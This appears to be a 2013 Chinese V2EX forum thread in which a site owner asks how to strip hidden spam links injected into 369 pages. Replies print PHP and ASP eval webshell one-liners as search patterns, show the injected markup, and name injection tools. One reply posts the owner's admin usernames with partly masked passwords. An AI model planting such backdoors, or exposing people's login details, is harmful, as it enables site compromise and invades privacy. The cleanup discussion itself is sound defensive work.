V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
asher
V2EX  ›  问与答

网站下的所有html、htm文件被写入一堆内容,可以通过正则判断把这些黑内容一次替换掉吗?

  •  
  •   asher · 2013-04-21 19:27:34 +08:00 · 4432 次点击
    这是一个创建于 4234 天前的主题,其中的信息可能已经有所发展或是发生改变。
    用grep查了下,受影响的文件有369个。
    可以通过find或者sed把这些黑内容给清除掉吗?
    黑内容如下:
    <table style="margin-top: 20px;" align="center" width="968" border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
    <td width="450"><style type="text/css">
    #weblink1{width:100px;height:20px;line-height:20px;main-left:0px;main-bottom:10px;overflow:hidden;position:absolute;top:600px;left:0px;}
    #weblink1 a{display:block;font-size:12px;line-height:20px;text-decoration:none;font-family:Arial;cursor: default;}
    </style>
    <div id="weblink1"><a href="/">.</a><a href="/">.</a>
    …… (此处为一行又一行的链接)
    </div>

    提问一:想请问下这些内容是通过什么方式写入的?
    提问二:能通过正则判断把这些黑内容一次替换掉吗?
    提问三:是因为账号被泄露,还是因为程序有漏洞呢?

    谢谢.
    第 1 条附言  ·  2013-04-21 23:15:38 +08:00
    在@laoyu 的帮助下解决了,非常感谢。
    15 条回复    1970-01-01 08:00:00 +08:00
    laoyu
        1
    laoyu  
       2013-04-21 19:38:40 +08:00   ❤️ 1
    第一:基本可以判断是用webshell批量挂的黑链
    第二:能
    第三:不一定帐号被泄露但肯定程序有漏洞,最好把账户密码改掉,然后查找把漏洞补上,如果不是什么大站80%是注入引起的,你就说下你用的什么程序,再分析!
    laoyu
        2
    laoyu  
       2013-04-21 19:44:26 +08:00
    补充一下
    如果是开源或者公开的程序,说一下是什么程序,我帮你分析下漏洞原因。
    光清除黑链也没什么用,可能webshell还在,或者一句好木马还在。

    先查木马吧,全站查找类似如下:

    如果是PHP: <?php @eval($_POST['pass']);?>
    如果是ASP: <%eval request("pass")%>
    fityme
        3
    fityme  
       2013-04-21 19:55:18 +08:00
    @laoyu 我记得之前用wordpress的时候也被挂了好多
    laoyu
        4
    laoyu  
       2013-04-21 19:58:54 +08:00   ❤️ 1
    这个还需要具体分析 wp被黑几率很小,除非你服务器上还有其他的站旁注过去的

    我现在怀疑LZ就是这么个问题 而且怀疑是他的ECSHOP程序,booko?这个站?
    laoyu
        5
    laoyu  
       2013-04-21 20:06:38 +08:00
    @asher
    我瞎猜一下LZ的网站,http://www.ks-book.com 这个,和上面的那个,还有个就不贴了。
    用的ECSHOP 这个漏洞就太多了,两个管理员
    用户名asher
    密码:lin_80***6
    用户名:lingc
    密码:asher****51
    asher
        6
    asher  
    OP
       2013-04-21 20:11:26 +08:00
    @laoyu 汗,能给个联系方式吗?另我能申请@livid删除5楼这个回复吗?
    并希望@laoyu 可以不见怪。。
    laoyu
        7
    laoyu  
       2013-04-21 20:13:31 +08:00   ❤️ 1
    @asher 你承认就好了,即使你什么都没说,还是能查到你的一些信息,另外ECSHOP漏洞太多了
    5L的内容也不算敏感。你给我个联系方式我帮助你解决下就好了。
    asher
        8
    asher  
    OP
       2013-04-21 20:16:27 +08:00
    lin.lion # gmail.com 谢谢。
    workaholic
        9
    workaholic  
       2013-04-21 20:55:43 +08:00
    有工具能解决,批量删除黑链,其实就是遍历目录和正则文件内容
    ljbha007
        10
    ljbha007  
       2013-04-21 21:50:00 +08:00
    @laoyu 你是怎么猜到的啊??这么厉害
    Tiny
        11
    Tiny  
       2013-04-21 23:26:00 +08:00
    这个猜的好牛逼。。
    iloveyou
        12
    iloveyou  
       2013-04-22 08:03:26 +08:00
    这就是传说中的实时黑吗?
    taogogo
        13
    taogogo  
       2013-04-22 10:25:34 +08:00
    只要有注入,工具一扫就可以拿到了,win下有明小子旁注、啊D注入工具、HDSI等,linux、mac下有sqlmap都挺好用的。

    建议小白天天上: www.hackdig.com 学习黑客知识。。。
    sobigfish
        14
    sobigfish  
       2013-04-22 10:35:25 +08:00
    天啊,ShopEx真心恐怖啊

    http://www.wooyun.org/corps/ShopEx
    why
        15
    why  
       2013-04-22 12:32:55 +08:00
    搜索 #weblink1 a{display:block;font-size:12px;
    再看lz的会员主页
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1583 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 17:07 · PVG 01:07 · LAX 09:07 · JFK 12:07
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.